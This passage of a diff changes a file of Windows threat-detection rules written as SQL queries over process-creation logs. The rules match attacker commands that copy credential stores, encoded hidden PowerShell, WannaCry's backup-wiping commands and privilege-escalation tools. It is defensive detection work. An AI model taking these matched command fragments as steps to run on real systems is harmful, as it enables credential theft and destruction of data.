"high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '%scecli\\\\0%' ESCAPE '\\' AND CommandLine LIKE '%reg add%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml" + "filename": "proc_creation_win_schtasks_delete.yml" }, { - "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", - "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "title": "Turla Group Commands May 2020", + "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", "status": "test", - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "author": "John Lambert (rule)", + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine 
LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + "filename": "proc_creation_win_apt_turla_comrat_may20.yml" }, { - "title": "WebDav Client Execution", - "id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", - "status": "test", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", - 
"author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Shells Spawned by Java", + "id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "status": "experimental", + "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Legitimate calls to system binaries", + "Company specific internal usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%build%' ESCAPE '\\' AND CommandLine LIKE '%build%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_webdav_client_execution.yml" + "filename": "proc_creation_win_java_susp_child_process_2.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", - "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "title": "Install New Package Via Winget Local Manifest", + "id": "313d6012-51a0-4d93-8dfc-de8553239e25", "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of winget to install 
applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.\nThe manifest option enables you to install an application by passing in a YAML file directly to the client.\nWinget can be used to download and install exe, msi or msix files later.\n", + "author": "Sreeman, Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Some false positives are expected in some environment that may use this functionality to install and test their custom applications" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\') AND (CommandLine LIKE '%-m %' ESCAPE '\\' OR CommandLine LIKE '%--manifest%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_new_network_provider.yml" + "filename": "proc_creation_win_winget_local_install_via_manifest.yml" }, { - "title": "Nslookup PowerShell Download Cradle - ProcessCreation", - "id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", + "title": "Rundll32 UNC Path Execution", + "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", "status": "experimental", - "description": "Detects suspicious powershell download cradle using nslookup. 
This cradle uses nslookup to extract payloads from DNS records", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nslookup.exe%' ESCAPE '\\' OR OriginalFileName LIKE '\\\\nslookup.exe' ESCAPE '\\') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -q=txt %' ESCAPE '\\' OR CommandLine LIKE '% -querytype=txt %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_nslookup_poweshell_download.yml" + "filename": "proc_creation_win_rundll32_unc_path.yml" }, { - "title": "Suspicious File Download Using Office Application", - "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "title": "Copying Sensitive Files with Credential Data", + "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "status": "test", - "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", - "author": "Beyu Denis, oscd.community", + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", 
+ "attack.s0404" ], "falsepositives": [ - "Unknown" + "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_office.yml" + "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" }, { - "title": "HackTool - UACMe Akagi Execution", - "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "title": "Suspicious CustomShellHost Execution", + "id": "84b14121-9d14-416e-800b-f3b829c5a14d", "status": "experimental", - "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", - "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects 
the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (NewProcessName LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" + "SELECT * FROM logs 
WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\CustomShellHost.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_uacme.yml" + "filename": "proc_creation_win_lolbin_customshellhost.yml" }, { - "title": "WannaCry Ransomware Activity", - "id": "41d40bff-377a-43e2-8e1b-2e543069e079", - "status": "test", - "description": "Detects WannaCry ransomware activity", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "title": "Renamed PsExec Service Execution", + "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "status": "experimental", + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", - "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\111.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR NewProcessName LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' 
ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'psexesvc.exe' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_wannacry.yml" + "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" }, { - "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", - "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", - "status": "test", - "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", - "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Dridex Activity", + "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "status": "stable", + "description": "Detects potential Dridex acitvity via specific process patterns", + "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE 
'%manage-bde.wsf%' ESCAPE '\\') OR (((ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_manage_bde.yml" + "filename": "proc_creation_win_malware_dridex.yml" }, { - "title": "Potential MSTSC Shadowing Activity", - "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", + "title": "Sysprep on AppData Folder", + "id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", "status": "test", - "description": "Detects RDP session hijacking by using MSTSC shadowing", + "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], 
- "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sysprep.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" + "filename": "proc_creation_win_sysprep_appdata.yml" }, { - "title": "HackTool - SharpUp PrivEsc Tool Execution", - "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "title": "Replace.exe Usage", + "id": "9292293b-8496-4715-9db6-37028dcda4b3", "status": "experimental", - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Replace.exe which can be used to replace file with another file", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\replace.exe' ESCAPE '\\' AND (CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE 
'\\'))" ], - "filename": "proc_creation_win_hktl_sharpup.yml" + "filename": "proc_creation_win_lolbin_replace.yml" }, { - "title": "DarkSide Ransomware Pattern", - "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "title": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", + "id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", "status": "test", - "description": "Detects DarkSide Ransomware and helpers", - "author": "Florian Roth (Nextron Systems)", + "description": "dotnet.exe will execute any DLL and execute unsigned code", + "author": "Beyu Denis, oscd.community", "tags": [ "attack.execution", - "attack.t1204" + "attack.t1218" ], "falsepositives": [ - "Unknown", - "UAC bypass method used by other malware" + "System administrator Usage" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dotnet.exe' ESCAPE '\\' OR OriginalFileName = '.NET Host') AND (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.csproj' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_darkside_ransomware.yml" + "filename": "proc_creation_win_lolbin_dotnet.yml" }, { - "title": "Time Travel Debugging Utility Usage", - "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "title": "RDP Connection Allowed Via Netsh.EXE", + "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. 
Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", + "author": "Sander Wiebing", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1562.004" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\tttracer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND 